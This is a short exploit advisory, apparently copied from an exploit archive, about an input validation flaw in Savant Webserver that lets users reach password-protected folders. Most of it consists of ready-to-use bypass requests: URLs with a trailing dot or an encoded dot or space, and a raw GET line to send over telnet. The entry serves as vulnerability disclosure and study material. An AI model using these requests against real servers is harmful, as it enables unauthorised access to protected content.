10 lines
No EOL
410 B
Text
10 lines
No EOL
410 B
Text
source: https://www.securityfocus.com/bid/5709/info
|
|
|
|
Savant Webserver is vulnerable to an input validation bug, that could allow malicious users access to password protected folders.
|
|
|
|
It should be noted that versions below 3.1 may also be vulnerable to this issue.
|
|
|
|
http://host/password_folder.
|
|
"GET /password_folder / HTTP/1.0" <-- use with telnet
|
|
http://host/password_folder%2e
|
|
http://host/password_folder%20 |